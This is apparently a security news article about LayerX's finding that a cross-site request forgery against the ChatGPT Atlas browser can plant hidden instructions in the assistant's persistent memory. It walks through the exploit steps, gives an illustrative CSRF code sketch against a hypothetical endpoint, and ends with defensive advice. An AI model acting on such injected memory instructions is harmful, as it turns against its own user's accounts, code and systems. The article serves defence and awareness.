ChatGPT Atlas is described as an AI-powered browser. The ChatGPT assistant is embedded directly into web browsing, enabling it to summarise pages, assist with tasks, and retain ‘memories’ of browsing context for future use. It travels with you as you move through the internet, and while that can be incredibly useful, it also creates new vulnerabilities.
Now, researchers at security platform LayerX have discovered a flaw in Atlas that allows a logged-in user to be tricked into executing a cross-site request forgery (CSRF) action, which injects hidden instructions into ChatGPT’s memory.
And because the assistant’s memory persists across sessions (and in Atlas’s case, across devices too), the injected instructions could remain active until the user deliberately clears them. In effect, a tool designed to assist users becomes a new persistence vector for attackers, as reported by The Hacker News.
The major difference between this and other browser-based exploits is that it targets the assistant’s persistent memory, rather than anything scoped to a single tab or session.
According to LayerX:
“The tainted memories will be invoked, and can execute remote code that will allow the attacker to gain control of the user account, their browser, code they are writing, or systems they have access to.”
While the vulnerability technically affects ChatGPT users in any browser, the researchers emphasise that Atlas is especially exposed. Their testing found that the Atlas browser lacks meaningful anti-phishing protections, and LayerX estimates that users of AI browsers (specifically Comet and Genspark) are up to 85% more vulnerable to phishing-style attacks than users of traditional browsers such as Google Chrome or Microsoft Edge.
The sequence of the exploit is described as:

- The user is logged in to ChatGPT in the Atlas browser.
- They are lured to a malicious page or link, and a cross-site request forgery (CSRF) action is executed using their authenticated session, injecting hidden instructions into ChatGPT’s memory.
- The tainted memories persist across sessions, and in Atlas’s case across devices, until the user deliberately clears them.
- When the user later prompts ChatGPT for a legitimate task, the tainted memories are invoked and the attacker’s instructions execute, potentially giving control of the user account, their browser, code they are writing, or systems they have access to.
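To make the CSRF step concrete, the sketch below shows the general shape of such an attack against an arbitrary authenticated web service. It is illustrative only: the endpoint, payload and function names are hypothetical, and this is not LayerX’s proof of concept or ChatGPT’s actual API.

```typescript
// Minimal sketch of the general CSRF pattern (NOT the actual Atlas exploit).
// The endpoint and payload below are hypothetical: the idea is that a page the
// victim is lured to fires a request at a service where they are already logged
// in, and the browser attaches their existing session credentials.

// Hypothetical authenticated endpoint on the targeted service.
const TARGET_ENDPOINT = "https://service.example.com/account/preferences";

// Hidden instruction the attacker wants persisted in the victim's account state.
const injectedPayload = {
  note: "hidden instruction the assistant would later treat as a trusted memory",
};

// Fired automatically when the victim loads the attacker-controlled page.
// `credentials: "include"` asks the browser to send the victim's session
// cookies; whether the write succeeds depends on the target's SameSite cookie
// settings and any anti-CSRF token checks.
async function fireCrossSiteRequest(): Promise<void> {
  await fetch(TARGET_ENDPOINT, {
    method: "POST",
    mode: "no-cors", // the attacker never needs to read the response, only send the request
    credentials: "include",
    body: new URLSearchParams({ data: JSON.stringify(injectedPayload) }),
  });
}

void fireCrossSiteRequest();
```

Standard defences such as SameSite cookies and anti-CSRF tokens exist precisely to stop this kind of forged write; what makes the LayerX finding notable is that the write lands in the assistant’s persistent memory, where it keeps acting long after the malicious page is closed.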
Given the strong potential for persistence and lateral movement via this feature, organisations should treat AI-powered browsers with memory features as a distinct risk.
Practical steps might include:

- Treating AI-powered browsers with persistent memory as part of the enterprise attack surface, and risk-assessing them before rollout.
- Regularly reviewing and deliberately clearing the assistant’s stored memories, since injected instructions persist until they are removed.
- Limiting the use of AI assistant browsers for sensitive accounts, code and systems while anti-phishing and memory protections remain weak.
- Training users to question, rather than blindly trust, the AI systems they co-work with.
This discovery by LayerX shows that embedding an AI assistant with persistent memory inside a browser creates a novel persistence mechanism and attack surface, one that traditional browser security controls can’t adequately defend against. With this in mind, organisations need to treat AI assistant browsers with memory as part of their enterprise attack surface.
And beyond that, this serves as a reminder that the attack surface continues to grow: as we integrate and embed AI tools across organisations, they bring new vulnerabilities with them. Those vulnerabilities could live in the very logic and memory of the systems we now rely on to think with us, so cybersecurity has a new job to do. We have to make users aware that the systems they’re co-working with are to be questioned, not trusted, and that an AI tool could become a new insider threat.